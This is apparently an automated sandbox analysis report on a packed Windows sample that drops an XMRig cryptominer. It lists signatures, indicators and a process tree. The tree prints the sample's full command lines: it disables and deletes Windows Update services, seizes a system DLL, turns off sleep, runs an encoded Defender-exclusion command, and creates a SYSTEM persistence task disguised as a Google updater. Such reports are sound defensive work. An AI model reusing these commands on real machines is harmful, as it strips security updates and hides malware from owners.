Analysis
-
max time kernel
300s -
max time network
270s -
platform
windows7_x64 -
resource
win7-20220718-en -
resource tags
arch:x64arch:x86image:win7-20220718-enlocale:en-usos:windows7-x64system -
submitted
05-08-2022 22:15
Behavioral task
behavioral1
Sample
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
Resource
win7-20220718-en
General
-
Target
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
-
Size
7.1MB
-
MD5
2144e985a1fb8a18636dee1b1fcf096f
-
SHA1
fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a
-
SHA256
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895
-
SHA512
48d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exeupdater.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe -
XMRig Miner payload 13 IoCs
Processes:
resource yara_rule behavioral1/memory/1320-160-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1320-162-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1320-164-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1320-165-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1320-166-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1320-168-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1320-170-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1320-171-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1320-172-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1320-174-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1320-176-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1320-178-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1320-180-0x0000000140000000-0x0000000140809000-memory.dmp xmrig -
Drops file in Drivers directory 2 IoCs
Processes:
conhost.execonhost.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 968 updater.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 1980 takeown.exe 1920 icacls.exe 1692 takeown.exe 1752 icacls.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exeupdater.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion updater.exe -
Loads dropped DLL 1 IoCs
Processes:
taskeng.exepid process 1108 taskeng.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 1980 takeown.exe 1920 icacls.exe 1692 takeown.exe 1752 icacls.exe -
Processes:
resource yara_rule behavioral1/memory/1676-54-0x0000000000400000-0x0000000001066000-memory.dmp themida behavioral1/memory/1676-55-0x0000000000400000-0x0000000001066000-memory.dmp themida behavioral1/memory/1676-57-0x0000000000400000-0x0000000001066000-memory.dmp themida \Program Files\Google\Chrome\updater.exe themida C:\Program Files\Google\Chrome\updater.exe themida behavioral1/memory/968-95-0x0000000000400000-0x0000000001066000-memory.dmp themida behavioral1/memory/968-100-0x0000000000400000-0x0000000001066000-memory.dmp themida behavioral1/memory/968-102-0x0000000000400000-0x0000000001066000-memory.dmp themida C:\Program Files\Google\Chrome\updater.exe themida -
Processes:
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exeupdater.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA updater.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exeupdater.exepid process 1676 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe 968 updater.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exedescription pid process target process PID 2012 set thread context of 1320 2012 conhost.exe explorer.exe -
Drops file in Program Files directory 3 IoCs
Processes:
conhost.execonhost.exedescription ioc process File created C:\Program Files\Google\Chrome\updater.exe conhost.exe File opened for modification C:\Program Files\Google\Chrome\updater.exe conhost.exe File created C:\Program Files\Google\Libs\WR64.sys conhost.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 472 sc.exe 1048 sc.exe 1732 sc.exe 1320 sc.exe 1704 sc.exe 1552 sc.exe 1544 sc.exe 1576 sc.exe 1276 sc.exe 1752 sc.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 5 IoCs
Processes:
powershell.execonhost.exedescription ioc process Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c011ebae29a9d801 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ conhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" conhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe -
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 1456 reg.exe 1652 reg.exe 1400 reg.exe 1260 reg.exe 584 reg.exe 1568 reg.exe 636 reg.exe 1440 reg.exe 1668 reg.exe 916 reg.exe 472 reg.exe 968 reg.exe 584 reg.exe 1172 reg.exe 1440 reg.exe 1672 reg.exe 576 reg.exe 1744 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.execonhost.exepowershell.execonhost.exeexplorer.exepid process 1652 powershell.exe 1688 conhost.exe 1944 powershell.exe 2012 conhost.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe 1320 explorer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 464 -
Suspicious use of AdjustPrivilegeToken 14 IoCs
Processes:
powershell.exepowercfg.exepowercfg.execonhost.exepowercfg.exepowercfg.exetakeown.exepowershell.exepowercfg.exepowercfg.exepowercfg.exetakeown.execonhost.exeexplorer.exedescription pid process Token: SeDebugPrivilege 1652 powershell.exe Token: SeShutdownPrivilege 1804 powercfg.exe Token: SeShutdownPrivilege 1736 powercfg.exe Token: SeDebugPrivilege 1688 conhost.exe Token: SeShutdownPrivilege 1488 powercfg.exe Token: SeShutdownPrivilege 852 powercfg.exe Token: SeTakeOwnershipPrivilege 1980 takeown.exe Token: SeDebugPrivilege 1944 powershell.exe Token: SeShutdownPrivilege 1768 powercfg.exe Token: SeShutdownPrivilege 1784 powercfg.exe Token: SeShutdownPrivilege 1544 powercfg.exe Token: SeTakeOwnershipPrivilege 1692 takeown.exe Token: SeDebugPrivilege 2012 conhost.exe Token: SeLockMemoryPrivilege 1320 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.execonhost.execmd.execmd.exedescription pid process target process PID 1676 wrote to memory of 1688 1676 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe conhost.exe PID 1676 wrote to memory of 1688 1676 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe conhost.exe PID 1676 wrote to memory of 1688 1676 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe conhost.exe PID 1676 wrote to memory of 1688 1676 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe conhost.exe PID 1688 wrote to memory of 1652 1688 conhost.exe powershell.exe PID 1688 wrote to memory of 1652 1688 conhost.exe powershell.exe PID 1688 wrote to memory of 1652 1688 conhost.exe powershell.exe PID 1688 wrote to memory of 436 1688 conhost.exe cmd.exe PID 1688 wrote to memory of 436 1688 conhost.exe cmd.exe PID 1688 wrote to memory of 436 1688 conhost.exe cmd.exe PID 1688 wrote to memory of 524 1688 conhost.exe cmd.exe PID 1688 wrote to memory of 524 1688 conhost.exe cmd.exe PID 1688 wrote to memory of 524 1688 conhost.exe cmd.exe PID 436 wrote to memory of 1544 436 cmd.exe sc.exe PID 436 wrote to memory of 1544 436 cmd.exe sc.exe PID 436 wrote to memory of 1544 436 cmd.exe sc.exe PID 524 wrote to memory of 1804 524 cmd.exe powercfg.exe PID 524 wrote to memory of 1804 524 cmd.exe powercfg.exe PID 524 wrote to memory of 1804 524 cmd.exe powercfg.exe PID 436 wrote to memory of 1576 436 cmd.exe sc.exe PID 436 wrote to memory of 1576 436 cmd.exe sc.exe PID 436 wrote to memory of 1576 436 cmd.exe sc.exe PID 436 wrote to memory of 1048 436 cmd.exe sc.exe PID 436 wrote to memory of 1048 436 cmd.exe sc.exe PID 436 wrote to memory of 1048 436 cmd.exe sc.exe PID 524 wrote to memory of 1736 524 cmd.exe powercfg.exe PID 524 wrote to memory of 1736 524 cmd.exe powercfg.exe PID 524 wrote to memory of 1736 524 cmd.exe powercfg.exe PID 436 wrote to memory of 1276 436 cmd.exe sc.exe PID 436 wrote to memory of 1276 436 cmd.exe sc.exe PID 436 wrote to memory of 1276 436 cmd.exe sc.exe PID 436 wrote to memory of 1752 436 cmd.exe sc.exe PID 436 wrote to memory of 1752 436 cmd.exe sc.exe PID 436 wrote to memory of 1752 436 cmd.exe sc.exe PID 524 wrote to memory of 1488 524 cmd.exe powercfg.exe PID 524 wrote to memory of 1488 524 cmd.exe powercfg.exe PID 524 wrote to memory of 1488 524 cmd.exe powercfg.exe PID 436 wrote to memory of 636 436 cmd.exe reg.exe PID 436 wrote to memory of 636 436 cmd.exe reg.exe PID 436 wrote to memory of 636 436 cmd.exe reg.exe PID 524 wrote to memory of 852 524 cmd.exe powercfg.exe PID 524 wrote to memory of 852 524 cmd.exe powercfg.exe PID 524 wrote to memory of 852 524 cmd.exe powercfg.exe PID 436 wrote to memory of 1672 436 cmd.exe reg.exe PID 436 wrote to memory of 1672 436 cmd.exe reg.exe PID 436 wrote to memory of 1672 436 cmd.exe reg.exe PID 436 wrote to memory of 1440 436 cmd.exe reg.exe PID 436 wrote to memory of 1440 436 cmd.exe reg.exe PID 436 wrote to memory of 1440 436 cmd.exe reg.exe PID 436 wrote to memory of 1260 436 cmd.exe reg.exe PID 436 wrote to memory of 1260 436 cmd.exe reg.exe PID 436 wrote to memory of 1260 436 cmd.exe reg.exe PID 436 wrote to memory of 576 436 cmd.exe reg.exe PID 436 wrote to memory of 576 436 cmd.exe reg.exe PID 436 wrote to memory of 576 436 cmd.exe reg.exe PID 436 wrote to memory of 1980 436 cmd.exe takeown.exe PID 436 wrote to memory of 1980 436 cmd.exe takeown.exe PID 436 wrote to memory of 1980 436 cmd.exe takeown.exe PID 436 wrote to memory of 1920 436 cmd.exe icacls.exe PID 436 wrote to memory of 1920 436 cmd.exe icacls.exe PID 436 wrote to memory of 1920 436 cmd.exe icacls.exe PID 1688 wrote to memory of 1560 1688 conhost.exe cmd.exe PID 1688 wrote to memory of 1560 1688 conhost.exe cmd.exe PID 1688 wrote to memory of 1560 1688 conhost.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe"C:\Users\Admin\AppData\Local\Temp\58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe"2⤵
- Drops file in Drivers directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAZABqAHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAeQAjAD4A"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""3⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"3⤵
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"4⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {54243AE5-4251-49D2-B2D9-33784D7803C6} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"3⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAZABqAHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAeQAjAD4A"4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE5⤵
-
